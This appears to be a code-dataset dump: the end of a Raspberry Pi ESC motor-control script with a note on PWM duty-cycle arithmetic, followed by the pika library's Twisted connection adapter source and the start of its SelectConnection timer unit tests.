LeftSpeed = LeftSpeed + 0.25\n elif(ctrl == \"s\"):\n LeftSpeed = LeftSpeed - 0.25\n RightSpeed= RightSpeed - 0.25\n elif(ctrl == \"d\"):\n RightSpeed = RightSpeed + 0.25\n elif(ctrl == \"w\"):\n RightSpeed = RightSpeed + 0.25\n LeftSpeed = LeftSpeed + 0.25\n elif(ctrl == \"max\"):\n LeftSpeed = MaxSpeed\n RightSpeed = MaxSpeed\n elif(ctrl == \"n\"):\n LeftSpeed = Neutral\n RightSpeed = Neutral\n elif(ctrl 
== \"min\"):\n LeftSpeed = MinSpeed\n RightSpeed = MinSpeed\n elif(ctrl ==\"q\"):\n running = False\n\n RightMotor.ChangeDutyCycle(RightSpeed)\n LeftMotor.ChangeDutyCycle(LeftSpeed)\n\n\n \n print(\"LeftSpeed = \" + str(LeftSpeed) + \"RightSpeed = \" + str(RightSpeed))\n \n" } ]
5
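All four ConfigureESC scripts above drive the ESC the same way: a duty-cycle percentage is handed to pigpio's hardware_PWM, whose duty argument is in millionths of the period (hence the recurring speed*10000). At 50 Hz the period is 20 ms, so D percent duty equals a pulse of D * 0.2 ms, which is why Neutral = 0.15 * Frequency = 7.5 corresponds to the standard 1.5 ms servo pulse. A small helper distilling that arithmetic; the helper name and GPIO pin are assumptions, not the repo's code:

    import pigpio

    def set_pulse_ms(pi, pin, pulse_ms, frequency=50):
        # D% duty of a (1000 / frequency) ms period gives pulse_ms of high time.
        period_ms = 1000.0 / frequency              # 20 ms at 50 Hz
        duty_percent = 100.0 * pulse_ms / period_ms
        pi.hardware_PWM(pin, frequency, int(duty_percent * 10000))  # millionths

    pi = pigpio.pi()
    set_pulse_ms(pi, 18, 1.5)  # neutral: 7.5% duty, the scripts' 0.15*Frequency
    set_pulse_ms(pi, 18, 2.0)  # full forward: 10% duty, MaxSpeed = 0.2*Frequency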
hugovk/pika
https://github.com/hugovk/pika
bcf215428c15ea8a5555d1e3cd15d3ce7a9b9403
03542ef616a2a849e8bfb0845427f50e741ea0c6
c02157afcb4c65506f04de0548df74af1a2e10a5
refs/heads/master
2020-03-21T18:23:57.266981
2018-06-25T18:54:45
2018-06-25T18:54:45
138,889,211
0
0
BSD-3-Clause
2018-06-27T13:58:59
2018-06-26T19:36:43
2018-06-25T18:54:51
null
[ { "alpha_fraction": 0.5944910049438477, "alphanum_fraction": 0.595207691192627, "avg_line_length": 34.85810089111328, "blob_id": "4ed86dd22245aa042d90eaabda0ada55ed4c9c63", "content_id": "2228b43eda2d78788321c97f377dddb19cc73a0d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32093, "license_type": "permissive", "max_line_length": 88, "num_lines": 895, "path": "/pika/adapters/twisted_connection.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "\"\"\"Using Pika with a Twisted reactor.\n\nSupports two methods of establishing the connection, using TwistedConnection\nor TwistedProtocolConnection. For details about each method, see the docstrings\nof the corresponding classes.\n\nThe interfaces in this module are Deferred-based when possible. This means that\nthe connection.channel() method and most of the channel methods return\nDeferreds instead of taking a callback argument and that basic_consume()\nreturns a Twisted DeferredQueue where messages from the server will be\nstored. Refer to the docstrings for TwistedConnection.channel() and the\nTwistedChannel class for details.\n\n\"\"\"\n\nimport functools\nimport logging\nimport socket\n\nfrom zope.interface import implementer\nfrom twisted.internet.interfaces import (IReadWriteDescriptor,\n IHalfCloseableDescriptor)\nfrom twisted.internet import (defer, error as twisted_error, reactor,\n threads as twisted_threads)\nimport twisted.python.failure\n\nimport pika.connection\nfrom pika import exceptions\nfrom pika.adapters import base_connection\nfrom pika.adapters.utils import nbio_interface, io_services_utils\nfrom pika.adapters.utils.io_services_utils import (check_callback_arg,\n check_fd_arg)\n\n# Twistisms\n# pylint: disable=C0111,C0103\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ClosableDeferredQueue(defer.DeferredQueue):\n \"\"\"\n Like the normal Twisted DeferredQueue, but after close() is called with an\n exception instance all pending Deferreds are errbacked and further attempts\n to call get() or put() return a Failure wrapping that exception.\n \"\"\"\n\n def __init__(self, size=None, backlog=None):\n self.closed = None\n super(ClosableDeferredQueue, self).__init__(size, backlog)\n\n def put(self, obj):\n if self.closed:\n return defer.fail(self.closed)\n return defer.DeferredQueue.put(self, obj)\n\n def get(self):\n if self.closed:\n return defer.fail(self.closed)\n return defer.DeferredQueue.get(self)\n\n def close(self, reason):\n self.closed = reason\n while self.waiting:\n self.waiting.pop().errback(reason)\n self.pending = []\n\n\nclass TwistedChannel(object):\n \"\"\"A wrapper around Pika's Channel.\n\n Channel methods that normally take a callback argument are wrapped to\n return a Deferred that fires with whatever would be passed to the callback.\n If the channel gets closed, all pending Deferreds are errbacked with a\n ChannelClosed exception. 
The returned Deferreds fire with whatever\n arguments the callback to the original method would receive.\n\n The basic_consume method is wrapped in a special way, see its docstring for\n details.\n \"\"\"\n\n WRAPPED_METHODS = ('exchange_declare', 'exchange_delete', 'queue_declare',\n 'queue_bind', 'queue_purge', 'queue_unbind', 'basic_qos',\n 'basic_get', 'basic_recover', 'tx_select', 'tx_commit',\n 'tx_rollback', 'flow', 'basic_cancel')\n\n def __init__(self, channel):\n self.__channel = channel\n self.__closed = None\n self.__calls = set()\n self.__consumers = {}\n\n channel.add_on_close_callback(self.channel_closed)\n\n def channel_closed(self, _channel, reason):\n # enter the closed state\n self.__closed = reason\n # errback all pending calls\n for d in self.__calls:\n d.errback(self.__closed)\n # close all open queues\n for consumers in self.__consumers.values():\n for c in consumers:\n c.close(self.__closed)\n # release references to stored objects\n self.__calls = set()\n self.__consumers = {}\n\n def basic_consume(self, *args, **kwargs):\n \"\"\"Consume from a server queue. Returns a Deferred that fires with a\n tuple: (queue_object, consumer_tag). The queue object is an instance of\n ClosableDeferredQueue, where data received from the queue will be\n stored. Clients should use its get() method to fetch individual\n message.\n \"\"\"\n if self.__closed:\n return defer.fail(self.__closed)\n\n queue = ClosableDeferredQueue()\n queue_name = kwargs['queue']\n kwargs['callback'] = lambda *args: queue.put(args)\n self.__consumers.setdefault(queue_name, set()).add(queue)\n\n try:\n consumer_tag = self.__channel.basic_consume(*args, **kwargs)\n # TODO this except without types would suppress system-exiting\n # exceptions, such as SystemExit and KeyboardInterrupt. It should be at\n # least `except Exception` and preferably more specific.\n except:\n return defer.fail()\n\n return defer.succeed((queue, consumer_tag))\n\n def queue_delete(self, *args, **kwargs):\n \"\"\"Wraps the method the same way all the others are wrapped, but removes\n the reference to the queue object after it gets deleted on the server.\n\n \"\"\"\n wrapped = self.__wrap_channel_method('queue_delete')\n queue_name = kwargs['queue']\n\n d = wrapped(*args, **kwargs)\n return d.addCallback(self.__clear_consumer, queue_name)\n\n def basic_publish(self, *args, **kwargs):\n \"\"\"Make sure the channel is not closed and then publish. Return a\n Deferred that fires with the result of the channel's basic_publish.\n\n \"\"\"\n if self.__closed:\n return defer.fail(self.__closed)\n return defer.succeed(self.__channel.basic_publish(*args, **kwargs))\n\n def __wrap_channel_method(self, name):\n \"\"\"Wrap Pika's Channel method to make it return a Deferred that fires\n when the method completes and errbacks if the channel gets closed. 
If\n the original method's callback would receive more than one argument, the\n Deferred fires with a tuple of argument values.\n\n \"\"\"\n method = getattr(self.__channel, name)\n\n @functools.wraps(method)\n def wrapped(*args, **kwargs):\n if self.__closed:\n return defer.fail(self.__closed)\n\n d = defer.Deferred()\n self.__calls.add(d)\n d.addCallback(self.__clear_call, d)\n\n def single_argument(*args):\n \"\"\"\n Make sure that the deferred is called with a single argument.\n In case the original callback fires with more than one, convert\n to a tuple.\n \"\"\"\n if len(args) > 1:\n d.callback(tuple(args))\n else:\n d.callback(*args)\n\n kwargs['callback'] = single_argument\n\n try:\n method(*args, **kwargs)\n # TODO this except without types would suppress system-exiting\n # exceptions, such as SystemExit and KeyboardInterrupt. It should be\n # at least `except Exception` and preferably more specific.\n except:\n return defer.fail()\n return d\n\n return wrapped\n\n def __clear_consumer(self, ret, queue_name):\n self.__consumers.pop(queue_name, None)\n return ret\n\n def __clear_call(self, ret, d):\n self.__calls.discard(d)\n return ret\n\n def __getattr__(self, name):\n # Wrap methods defined in WRAPPED_METHODS, forward the rest of accesses\n # to the channel.\n if name in self.WRAPPED_METHODS:\n return self.__wrap_channel_method(name)\n return getattr(self.__channel, name)\n\n\nclass TwistedConnection(base_connection.BaseConnection):\n \"\"\"A standard Pika connection adapter. You instantiate the class passing the\n connection parameters and the connected callback and when it gets called\n you can start using it.\n\n The problem is that connection establishing is done using the blocking\n socket module. For instance, if the host you are connecting to is behind a\n misconfigured firewall that just drops packets, the whole process will\n freeze until the connection timeout passes. 
To work around that problem,\n use TwistedProtocolConnection, but read its docstring first.\n\n \"\"\"\n\n def __init__(self,\n parameters=None,\n on_open_callback=None,\n on_open_error_callback=None,\n on_close_callback=None,\n custom_ioloop=None,\n internal_connection_workflow=True):\n \"\"\"\n :param parameters:\n :param on_open_callback:\n :param on_open_error_callback:\n :param on_close_callback:\n :param custom_ioloop:\n :param internal_connection_workflow:\n\n \"\"\"\n if isinstance(custom_ioloop, nbio_interface.AbstractIOServices):\n nbio = custom_ioloop\n else:\n nbio = _TwistedIOServicesAdapter(custom_ioloop)\n\n super(TwistedConnection, self).__init__(\n parameters=parameters,\n on_open_callback=on_open_callback,\n on_open_error_callback=on_open_error_callback,\n on_close_callback=on_close_callback,\n nbio=nbio,\n internal_connection_workflow=internal_connection_workflow)\n\n @classmethod\n def create_connection(cls,\n connection_configs,\n on_done,\n custom_ioloop=None,\n workflow=None):\n \"\"\"Implement\n :py:classmethod:`pika.adapters.BaseConnection.create_connection()`.\n\n \"\"\"\n nbio = _TwistedIOServicesAdapter(custom_ioloop)\n\n def connection_factory(params):\n \"\"\"Connection factory.\"\"\"\n if params is None:\n raise ValueError('Expected pika.connection.Parameters '\n 'instance, but got None in params arg.')\n return cls(\n parameters=params,\n custom_ioloop=nbio,\n internal_connection_workflow=False)\n\n return cls._start_connection_workflow(\n connection_configs=connection_configs,\n connection_factory=connection_factory,\n nbio=nbio,\n workflow=workflow,\n on_done=on_done)\n\n def channel(self, channel_number=None):\n \"\"\"Return a Deferred that fires with an instance of a wrapper around the\n Pika Channel class.\n\n \"\"\"\n d = defer.Deferred()\n super(TwistedConnection, self).channel(channel_number, d.callback)\n return d.addCallback(TwistedChannel)\n\n\nclass TwistedProtocolConnection(pika.connection.Connection):\n \"\"\"A hybrid between a Pika Connection and a Twisted Protocol. Allows using\n Twisted's non-blocking connectTCP/connectSSL methods for connecting to the\n server.\n\n It has one caveat: TwistedProtocolConnection objects have a ready\n instance variable that's a Deferred which fires when the connection is\n ready to be used (the initial AMQP handshaking has been done). You *have*\n to wait for this Deferred to fire before requesting a channel.\n\n Since it's Twisted handling connection establishing it does not accept\n connect callbacks, you have to implement that within Twisted. 
Also remember\n that the host, port and ssl values of the connection parameters are ignored\n because, yet again, it's Twisted who manages the connection.\n\n NOTE: since `base_connection.BaseConnection`'s primary responsibility is\n management of the transport, we use `pika.connection.Connection` directly as\n our base class because this adapter uses a different transport management\n strategy.\n\n \"\"\"\n def __init__(self,\n parameters=None,\n on_close_callback=None,\n custom_reactor=None):\n\n super(TwistedProtocolConnection, self).__init__(\n parameters=parameters,\n on_open_callback=self.connectionReady,\n on_open_error_callback=self.connectionFailed,\n on_close_callback=on_close_callback,\n internal_connection_workflow=False)\n\n self.ready = defer.Deferred()\n self._reactor = custom_reactor or reactor\n self._transport = None # to be provided by `makeConnection()`\n\n def channel(self, channel_number=None):\n \"\"\"Create a new channel with the next available channel number or pass\n in a channel number to use. Must be non-zero if you would like to\n specify but it is recommended that you let Pika manage the channel\n numbers.\n\n Return a Deferred that fires with an instance of a wrapper around the\n Pika Channel class.\n\n :param int channel_number: The channel number to use, defaults to the\n next available.\n\n \"\"\"\n d = defer.Deferred()\n super(TwistedProtocolConnection, self).channel(channel_number,\n d.callback)\n return d.addCallback(TwistedChannel)\n\n\n def _adapter_add_timeout(self, deadline, callback):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_add_timeout()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n return _TimerHandle(self._reactor.callLater(deadline, callback))\n\n def _adapter_remove_timeout(self, timeout_id):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_remove_timeout()`.\n\n \"\"\"\n timeout_id.cancel()\n\n def _adapter_add_callback_threadsafe(self, callback):\n \"\"\"Implement\n :py:meth:`pika.connection.Connection._adapter_add_callback_threadsafe()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n self._reactor.callFromThread(callback)\n\n def _adapter_connect_stream(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_connect_stream()`\n method.\n\n NOTE: This should not be called due to our initialization of Connection\n via `internal_connection_workflow=False`\n \"\"\"\n raise NotImplementedError\n\n def _adapter_disconnect_stream(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_disconnect_stream()`\n method.\n\n \"\"\"\n self._transport.abort()\n\n def _adapter_emit_data(self, data):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_emit_data()` method.\n\n \"\"\"\n self._transport.write(data)\n\n def _adapter_get_write_buffer_size(self):\n \"\"\"Implement pure virtual\n :py:ref:meth:`pika.connection.Connection._adapter_emit_data()` method.\n\n TODO: this method only belongs in SelectConnection, none others needs it\n and twisted transport doesn't expose it.\n \"\"\"\n raise NotImplementedError\n\n # IProtocol methods\n\n def dataReceived(self, data):\n # Pass the bytes to Pika for parsing\n self._on_data_available(data)\n\n def connectionLost(self, reason):\n self._transport = None\n\n # Let the caller know there's been an error\n d, self.ready = self.ready, None\n if d:\n d.errback(reason)\n\n self._on_stream_terminated(reason)\n\n def makeConnection(self, transport):\n 
self._transport = transport\n self._on_stream_connected()\n self.connectionMade()\n\n def connectionMade(self):\n # Tell everyone we're connected\n pass\n\n # Our own methods\n\n def connectionReady(self, res):\n d, self.ready = self.ready, None\n if d:\n d.callback(res)\n\n def connectionFailed(self, _connection, _error_message=None):\n d, self.ready = self.ready, None\n if d:\n attempts = self.params.connection_attempts\n exc = exceptions.AMQPConnectionError(attempts)\n d.errback(exc)\n\n\nclass _TwistedIOServicesAdapter(\n io_services_utils.SocketConnectionMixin,\n io_services_utils.StreamingConnectionMixin,\n nbio_interface.AbstractIOServices,\n nbio_interface.AbstractFileDescriptorServices):\n \"\"\"Implements\n :py:class:`.utils.nbio_interface.AbstractIOServices` interface\n on top of :py:class:`twisted.internet.reactor`.\n\n NOTE:\n :py:class:`.utils.nbio_interface.AbstractFileDescriptorServices`\n interface is only required by the mixins.\n\n \"\"\"\n\n @implementer(IHalfCloseableDescriptor, IReadWriteDescriptor)\n class _SocketReadWriteDescriptor(object):\n \"\"\"File descriptor wrapper for `add/remove-Writer/Reader`. A given\n instance must represent both reader and writer, otherwise reactor\n may invoke e.g., doRead on a descriptor registered for on_writable\n callbacks, thus causing that event to be lost.\n\n \"\"\"\n\n def __init__(self, fd, on_readable=None, on_writable=None):\n\n assert on_readable is not None or on_writable is not None, (\n 'At least one of on_readable/on_writable must be non-None.')\n assert callable(on_readable) or callable(on_writable), (\n 'One or both of on_readable/on_writable must be callable.')\n\n self._fd = fd\n\n self._on_readable = on_readable\n self._on_writable = on_writable\n\n def __repr__(self):\n return '{}: fd={}, on_readable={!r}, on_writable={!r}'.format(\n self.__class__.__name__,\n self._fd,\n self._on_readable,\n self.on_writable)\n\n @property\n def on_readable(self):\n return self._on_readable\n\n @on_readable.setter\n def on_readable(self, value):\n assert callable(value) or value is None, (\n 'on_readable value must be callable or None.')\n self._on_readable = value\n\n @property\n def on_writable(self):\n return self._on_writable\n\n @on_writable.setter\n def on_writable(self, value):\n assert callable(value) or value is None, (\n 'on_writable value must be callable or None.')\n self._on_writable = value\n\n def logPrefix(self):\n return self.__class__.__name__\n\n def fileno(self):\n \"\"\"\n :raise: If the descriptor no longer has a valid file descriptor\n number associated with it.\n\n :return: The platform-specified representation of a file descriptor\n number. Or C{-1} if the descriptor no longer has a valid file\n descriptor number associated with it. As long as the descriptor\n is valid, calls to this method on a particular instance must\n return the same value.\n \"\"\"\n return self._fd\n\n def doRead(self):\n \"\"\"\n Some data is available for reading on your descriptor.\n\n @return: If an error is encountered which causes the descriptor to\n no longer be valid, a L{Failure} should be returned. 
Otherwise,\n L{None}.\n \"\"\"\n if self._on_readable is not None:\n try:\n self._on_readable()\n except Exception: # pylint: disable=W0703\n LOGGER.exception('Exception from user\\'s on_readable() '\n 'callback; fd=%s', self.fileno())\n return twisted.python.failure.Failure()\n else:\n LOGGER.warning('Reactor called %s.doRead() but on_readable is '\n 'None; fd=%s.', self.logPrefix(), self.fileno())\n\n return None\n\n def doWrite(self):\n \"\"\"\n Some data can be written to your descriptor.\n\n @return: If an error is encountered which causes the descriptor to\n no longer be valid, a L{Failure} should be returned. Otherwise,\n L{None}.\n \"\"\"\n if self._on_writable is not None:\n try:\n self._on_writable()\n except Exception: # pylint: disable=W0703\n LOGGER.exception('Exception from user\\'s on_writable() '\n 'callback; fd=%s', self.fileno())\n return twisted.python.failure.Failure()\n else:\n LOGGER.warning('Reactor called %s.doWrite() but on_writable is '\n 'None; fd=%s.', self.logPrefix(), self.fileno())\n\n return None\n\n def connectionLost(self, reason):\n \"\"\"\n Called when the connection is shut down.\n\n NOTE: even though we implement `IHalfCloseableDescriptor`, reactor\n still calls `connectionLost()` instead of `readConnectionLost()`\n and `writeConnectionLost()`.\n\n Clear any circular references here, and any external references\n to this Protocol. The connection has been closed. The C{reason}\n Failure wraps a L{twisted.internet.error.ConnectionDone} or\n L{twisted.internet.error.ConnectionLost} instance (or a subclass\n of one of those).\n\n @type reason: L{twisted.python.failure.Failure}\n \"\"\"\n LOGGER.error('Reactor called %s.connectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n\n if self._on_writable is not None:\n # Convert this to a writable event for compatibility with pika's\n # other I/O loops\n LOGGER.debug('%s: Converting connectionLost() to doWrite() for '\n 'compatibility with our other I/O loops; fd=%s',\n self.logPrefix(), self.fileno())\n self.doWrite()\n\n def readConnectionLost(self, reason):\n \"\"\"\n Indicates read connection was lost.\n \"\"\"\n LOGGER.error('Reactor called %s.readConnectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n return\n\n # NOTE: This appears to be unnecessary according to our async\n # services tests.\n #\n # # For compatibility with our own select/poll implementation's\n # # handling of closed input, we treat it as a readable event\n # if self._on_readable is not None:\n # self._on_readable()\n # else:\n # LOGGER.debug('Suppressing reactor\\'s call to '\n # '%s.readConnectionLost(%r) on writable '\n # 'descriptor; fd=%s.',\n # self.logPrefix(), reason, self.fileno())\n\n def writeConnectionLost(self, reason):\n \"\"\"\n Indicates write connection was lost.\n\n :param reason: A failure instance indicating the reason why the\n connection was lost. 
L{error.ConnectionLost} and\n L{error.ConnectionDone} are of special note, but the\n failure may be of other classes as well.\n\n \"\"\"\n LOGGER.error('Reactor called %s.writeConnectionLost(%r); fd=%s.',\n self.logPrefix(), reason, self.fileno())\n return\n\n # NOTE: This appears to be unnecessary according to our async\n # services tests.\n #\n # # For compatibility with our own select/poll implementation's\n # # handling POLLERR and similar, we treat it as a writable event\n # if self._on_writable is not None:\n # self._on_writable()\n # else:\n # LOGGER.debug('Suppressing reactor\\'s call to '\n # '%s.writeConnectionLost(%r) on readable '\n # 'descriptor; fd=%s.',\n # self.logPrefix(), reason, self.fileno())\n\n\n def __init__(self, in_reactor):\n \"\"\"\n :param None | twisted.internet.interfaces.IReactorFDSet reactor:\n\n \"\"\"\n self._reactor = in_reactor or reactor\n\n # Mapping of fd to _SocketReadWriteDescriptor\n self._fd_watchers = dict()\n\n def get_native_ioloop(self):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.get_native_ioloop()`.\n\n \"\"\"\n return self._reactor\n\n def close(self):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.close()`.\n\n \"\"\"\n # NOTE Twisted reactor doesn't seem to have an equivalent of `close()`\n # that other I/O loops have.\n pass\n\n def run(self):\n \"\"\"Implement :py:meth:`.utils.nbio_interface.AbstractIOServices.run()`.\n\n \"\"\"\n # NOTE: pika doesn't need signal handlers and installing them causes\n # exceptions in our tests that run the loop from a thread.\n self._reactor.run(installSignalHandlers=False)\n\n def stop(self):\n \"\"\"Implement :py:meth:`.utils.nbio_interface.AbstractIOServices.stop()`.\n\n \"\"\"\n self._reactor.stop()\n\n def add_callback_threadsafe(self, callback):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.add_callback_threadsafe()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n self._reactor.callFromThread(callback)\n\n def call_later(self, delay, callback):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.call_later()`.\n\n \"\"\"\n check_callback_arg(callback, 'callback')\n return _TimerHandle(self._reactor.callLater(delay, callback))\n\n def getaddrinfo(self, host, port, on_done, family=0, socktype=0, proto=0,\n flags=0):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractIOServices.getaddrinfo()`.\n\n \"\"\"\n # Use thread pool to run getaddrinfo asynchronously\n return _TwistedDeferredIOReference(\n twisted_threads.deferToThreadPool(\n self._reactor, self._reactor.getThreadPool(),\n socket.getaddrinfo,\n # NOTE: python 2.x getaddrinfo only takes positional args\n host,\n port,\n family,\n socktype,\n proto,\n flags),\n on_done)\n\n def set_reader(self, fd, on_readable):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.set_reader()`.\n\n \"\"\"\n LOGGER.debug('%s.set_reader(%s, %s)',\n self.__class__.__name__, fd, on_readable)\n check_fd_arg(fd)\n check_callback_arg(on_readable, 'or_readable')\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n descriptor = self._SocketReadWriteDescriptor(\n fd,\n on_readable=on_readable)\n self._fd_watchers[fd] = descriptor\n else:\n descriptor.on_readable = on_readable\n\n self._reactor.addReader(descriptor)\n\n def remove_reader(self, fd):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.remove_reader()`.\n\n \"\"\"\n LOGGER.debug('%s.remove_reader(%s)', 
self.__class__.__name__, fd)\n check_fd_arg(fd)\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n return False\n\n if descriptor.on_readable is None:\n assert descriptor.on_writable is not None, (\n '_SocketReadWriteDescriptor was neither readable nor writable.')\n return False\n\n descriptor.on_readable = None\n\n self._reactor.removeReader(descriptor)\n\n if descriptor.on_writable is None:\n self._fd_watchers.pop(fd)\n\n return True\n\n def set_writer(self, fd, on_writable):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.set_writer()`.\n\n \"\"\"\n LOGGER.debug('%s.set_writer(%s, %s)',\n self.__class__.__name__, fd, on_writable)\n check_fd_arg(fd)\n check_callback_arg(on_writable, 'on_writable')\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n descriptor = self._SocketReadWriteDescriptor(\n fd,\n on_writable=on_writable)\n self._fd_watchers[fd] = descriptor\n else:\n descriptor.on_writable = on_writable\n\n self._reactor.addWriter(descriptor)\n\n def remove_writer(self, fd):\n \"\"\"Implement\n :py:meth:`.utils.nbio_interface.AbstractFileDescriptorServices.remove_writer()`.\n\n \"\"\"\n LOGGER.debug('%s.remove_writer(%s)', self.__class__.__name__, fd)\n check_fd_arg(fd)\n try:\n descriptor = self._fd_watchers[fd]\n except KeyError:\n return False\n\n if descriptor.on_writable is None:\n assert descriptor.on_readable is not None, (\n '_SocketReadWriteDescriptor was neither writable nor readable.')\n return False\n\n descriptor.on_writable = None\n\n self._reactor.removeWriter(descriptor)\n\n if descriptor.on_readable is None:\n self._fd_watchers.pop(fd)\n return True\n\n\nclass _TimerHandle(nbio_interface.AbstractTimerReference):\n \"\"\"This module's adaptation of `nbio_interface.AbstractTimerReference`.\n\n \"\"\"\n\n def __init__(self, handle):\n \"\"\"\n\n :param twisted.internet.base.DelayedCall handle:\n \"\"\"\n self._handle = handle\n\n def cancel(self):\n if self._handle is not None:\n try:\n self._handle.cancel()\n except (twisted_error.AlreadyCalled,\n twisted_error.AlreadyCancelled):\n pass\n\n self._handle = None\n\n\nclass _TwistedDeferredIOReference(nbio_interface.AbstractIOReference):\n \"\"\"This module's adaptation of `nbio_interface.AbstractIOReference`\n for twisted defer.Deferred.\n\n On failure, extract the original exception from the Twisted Failure\n exception to pass to user's callback.\n\n \"\"\"\n\n def __init__(self, deferred, on_done):\n \"\"\"\n :param defer.Deferred deferred:\n :param callable on_done: user callback that takes the completion result\n or exception (check for `BaseException`) as its only arg. It will\n not be called if the operation was cancelled.\n\n \"\"\"\n check_callback_arg(on_done, 'on_done')\n\n self._deferred = deferred\n self._cancelling = False\n\n def on_done_adapter(result):\n \"\"\"Handle completion callback from the deferred instance. 
On\n Failure, extract the original exception from the Twisted Failure\n exception to pass to the user's callback.\n\n \"\"\"\n\n # NOTE: Twisted makes callback for cancelled deferred, but pika\n # doesn't want that\n if not self._cancelling:\n if isinstance(result, twisted.python.failure.Failure):\n LOGGER.debug(\n 'Deferred operation completed with Failure: %r',\n result)\n # Extract the original exception\n result = result.value\n on_done(result)\n\n deferred.addBoth(on_done_adapter)\n\n def cancel(self):\n \"\"\"Cancel pending operation\n\n :returns: False if was already done or cancelled; True otherwise\n\n \"\"\"\n already_processed = (\n self._deferred.called and\n not isinstance(self._deferred.result, defer.Deferred))\n\n # So that our callback wrapper will know to suppress the mandatory\n # errorback from Deferred.cancel()\n self._cancelling = True\n\n # Always call through to cancel() in case our Deferred was waiting for\n # another one to complete, so the other one would get cancelled, too\n self._deferred.cancel()\n\n return not already_processed\n" }, { "alpha_fraction": 0.5796964764595032, "alphanum_fraction": 0.5985041260719299, "avg_line_length": 38.011329650878906, "blob_id": "96917bc1dc79d7b8b5ed040c68fcb27aeddfb10c", "content_id": "72e3db59616c8e55ed74bbcac82816fca0998600", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13771, "license_type": "permissive", "max_line_length": 77, "num_lines": 353, "path": "/tests/unit/select_connection_timer_tests.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests for SelectConnection _Timer and _Timeout classes\n\n\"\"\"\n\nimport time\nimport unittest\n\nimport mock\n\nfrom pika.adapters import select_connection\n\n\n# Suppress protected-access\n# pylint: disable=W0212\n\n# Suppress missing-docstring\n# pylint: disable=C0111\n\n# Suppress invalid-name\n# pylint: disable=C0103\n\nclass TimeoutClassTests(unittest.TestCase):\n \"\"\"Test select_connection._Timeout class\"\"\"\n\n def test_properties(self):\n now = time.time()\n cb = lambda: None\n timeout = select_connection._Timeout(now + 5.3, cb)\n self.assertIs(timeout.callback, cb)\n self.assertEqual(timeout.deadline, now + 5.3)\n\n def test_non_negative_deadline(self):\n select_connection._Timeout(0, lambda: None)\n select_connection._Timeout(5, lambda: None)\n\n with self.assertRaises(ValueError) as cm:\n select_connection._Timeout(-1, lambda: None)\n\n self.assertIn('deadline must be non-negative epoch number',\n cm.exception.args[0])\n\n def test_non_callable_callback_raises(self):\n with self.assertRaises(TypeError) as cm:\n select_connection._Timeout(5, None)\n\n self.assertIn('callback must be a callable, but got',\n cm.exception.args[0])\n\n with self.assertRaises(TypeError) as cm:\n select_connection._Timeout(5, dict())\n\n self.assertIn('callback must be a callable, but got',\n cm.exception.args[0])\n\n def test_eq_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(5, lambda: None)\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertEqual(t1, t2)\n\n t2 = select_connection._Timeout(10, lambda: 5)\n self.assertNotEqual(t1, t2)\n\n def test_lt_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(4, lambda: None)\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertLess(t1, t2)\n\n t2 = select_connection._Timeout(4, lambda: 5)\n self.assertFalse(t1 < 
t2)\n\n t2 = select_connection._Timeout(3, lambda: 5)\n self.assertFalse(t1 < t2)\n\n def test_le_operator(self):\n # Comparison should be by deadline only\n t1 = select_connection._Timeout(4, lambda: None)\n t2 = select_connection._Timeout(4, lambda: 5)\n self.assertLessEqual(t1, t2)\n\n t2 = select_connection._Timeout(5, lambda: 5)\n self.assertLessEqual(t1, t2)\n\n t2 = select_connection._Timeout(3, lambda: 5)\n self.assertFalse(t1 <= t2)\n\n\nclass TimerClassTests(unittest.TestCase):\n \"\"\"Test select_connection._Timer class\"\"\"\n\n def test_close_empty(self):\n timer = select_connection._Timer()\n timer.close()\n self.assertIsNone(timer._timeout_heap)\n\n def test_close_non_empty(self):\n timer = select_connection._Timer()\n t1 = timer.call_later(10, lambda: 10)\n t2 = timer.call_later(20, lambda: 20)\n timer.close()\n self.assertIsNone(timer._timeout_heap)\n self.assertIsNone(t1.callback)\n self.assertIsNone(t2.callback)\n\n def test_no_timeouts_remaining_interval_is_none(self):\n timer = select_connection._Timer()\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_call_later_non_negative_delay_check(self):\n now = time.time()\n\n # 0 delay is okay\n with mock.patch('time.time', return_value=now):\n timer = select_connection._Timer()\n timer.call_later(0, lambda: None)\n self.assertEqual(timer._timeout_heap[0].deadline, now)\n self.assertEqual(timer.get_remaining_interval(), 0)\n\n # Positive delay is okay\n with mock.patch('time.time', return_value=now):\n timer = select_connection._Timer()\n timer.call_later(0.5, lambda: None)\n self.assertEqual(timer._timeout_heap[0].deadline, now + 